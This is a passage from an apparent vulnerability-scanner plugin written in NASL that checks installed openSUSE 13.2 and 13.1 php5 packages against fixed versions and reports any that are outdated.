rpm:\"php5-mssql-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql-debuginfo\", rpm:\"php5-mysql-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc-debuginfo\", rpm:\"php5-odbc-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-opcache\", rpm:\"php5-opcache~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-opcache-debuginfo\", rpm:\"php5-opcache-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl-debuginfo\", rpm:\"php5-openssl-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl-debuginfo\", rpm:\"php5-pcntl-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo-debuginfo\", rpm:\"php5-pdo-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql-debuginfo\", rpm:\"php5-pgsql-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar\", rpm:\"php5-phar~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar-debuginfo\", rpm:\"php5-phar-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix-debuginfo\", rpm:\"php5-posix-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell-debuginfo\", rpm:\"php5-pspell-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline-debuginfo\", rpm:\"php5-readline-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop-debuginfo\", rpm:\"php5-shmop-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp-debuginfo\", rpm:\"php5-snmp-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap-debuginfo\", rpm:\"php5-soap-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets-debuginfo\", rpm:\"php5-sockets-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite-debuginfo\", rpm:\"php5-sqlite-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin-debuginfo\", rpm:\"php5-suhosin-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg-debuginfo\", rpm:\"php5-sysvmsg-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem-debuginfo\", rpm:\"php5-sysvsem-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm-debuginfo\", rpm:\"php5-sysvshm-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy-debuginfo\", rpm:\"php5-tidy-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer-debuginfo\", rpm:\"php5-tokenizer-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx-debuginfo\", rpm:\"php5-wddx-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader-debuginfo\", rpm:\"php5-xmlreader-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc-debuginfo\", rpm:\"php5-xmlrpc-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter-debuginfo\", rpm:\"php5-xmlwriter-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl-debuginfo\", rpm:\"php5-xsl-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip-debuginfo\", rpm:\"php5-zip-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib-debuginfo\", rpm:\"php5-zlib-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5-debuginfo\", rpm:\"apache2-mod_php5-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath-debuginfo\", rpm:\"php5-bcmath-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2-debuginfo\", rpm:\"php5-bz2-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar-debuginfo\", rpm:\"php5-calendar-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype-debuginfo\", rpm:\"php5-ctype-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl-debuginfo\", rpm:\"php5-curl-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba-debuginfo\", rpm:\"php5-dba-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debuginfo\", rpm:\"php5-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debugsource\", rpm:\"php5-debugsource~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom-debuginfo\", rpm:\"php5-dom-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant\", rpm:\"php5-enchant~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant-debuginfo\", rpm:\"php5-enchant-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif-debuginfo\", rpm:\"php5-exif-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi-debuginfo\", rpm:\"php5-fastcgi-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo\", rpm:\"php5-fileinfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo-debuginfo\", rpm:\"php5-fileinfo-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird\", rpm:\"php5-firebird~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird-debuginfo\", rpm:\"php5-firebird-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm\", rpm:\"php5-fpm~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm-debuginfo\", rpm:\"php5-fpm-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp-debuginfo\", rpm:\"php5-ftp-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd-debuginfo\", rpm:\"php5-gd-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext-debuginfo\", rpm:\"php5-gettext-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp-debuginfo\", rpm:\"php5-gmp-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv-debuginfo\", rpm:\"php5-iconv-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap-debuginfo\", rpm:\"php5-imap-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl\", rpm:\"php5-intl~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl-debuginfo\", rpm:\"php5-intl-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json-debuginfo\", rpm:\"php5-json-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap-debuginfo\", rpm:\"php5-ldap-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring-debuginfo\", rpm:\"php5-mbstring-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt-debuginfo\", rpm:\"php5-mcrypt-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql\", rpm:\"php5-mssql~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql-debuginfo\", rpm:\"php5-mssql-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql-debuginfo\", rpm:\"php5-mysql-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc-debuginfo\", rpm:\"php5-odbc-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl-debuginfo\", rpm:\"php5-openssl-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl-debuginfo\", rpm:\"php5-pcntl-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo-debuginfo\", rpm:\"php5-pdo-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql-debuginfo\", rpm:\"php5-pgsql-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar\", rpm:\"php5-phar~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar-debuginfo\", rpm:\"php5-phar-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix-debuginfo\", rpm:\"php5-posix-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell-debuginfo\", rpm:\"php5-pspell-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline-debuginfo\", rpm:\"php5-readline-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop-debuginfo\", rpm:\"php5-shmop-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp-debuginfo\", rpm:\"php5-snmp-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap-debuginfo\", rpm:\"php5-soap-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets-debuginfo\", rpm:\"php5-sockets-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite-debuginfo\", rpm:\"php5-sqlite-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin-debuginfo\", rpm:\"php5-suhosin-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg-debuginfo\", rpm:\"php5-sysvmsg-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem-debuginfo\", rpm:\"php5-sysvsem-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm-debuginfo\", rpm:\"php5-sysvshm-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy-debuginfo\", rpm:\"php5-tidy-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer-debuginfo\", rpm:\"php5-tokenizer-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx-debuginfo\", rpm:\"php5-wddx-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader-debuginfo\", rpm:\"php5-xmlreader-debuginfo~5.4.20~67.1\", 